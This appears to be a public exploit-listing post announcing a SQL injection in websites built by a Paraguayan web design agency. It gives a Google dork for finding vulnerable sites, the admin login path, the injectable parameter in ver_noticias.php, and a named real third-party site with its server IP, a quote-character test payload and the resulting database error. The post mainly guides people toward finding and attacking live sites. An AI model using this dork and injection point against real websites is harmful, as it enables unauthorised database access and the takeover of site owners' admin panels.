facebook facebook twitter rss

Diseño y Desarrollo Creadores Agencia Paraguay SQL Injection

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : Diseño y Desarrollo Creadores Agencia Paraguay SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/01/2019
# Vendor Homepage : creadores.com.py
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Diseño y Desarrollo: Creadores" site:py
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################

# Admin Panel Login Path :
*************************
/admin/

# SQL Injection Exploit :
***********************

/ver_noticias.php?id=[SQL Injection]

##############################################################

# Example Vulnerable Site :
*************************

Note => (216.172.165.117) => There are 13 domains hosted on this server.

[+] gildaarrua.com/ver_noticias.php?id=43%27 =>

[ Proof of Concept ] => archive.fo/eAWS2

##############################################################

# SQL Database Error :
**********************
Warning: mysqli_fetch_array() expects parameter 1
to be mysqli_result, boolean given in /home/gildaarrua
/public_html/ver_noticias.php on line 82

##############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :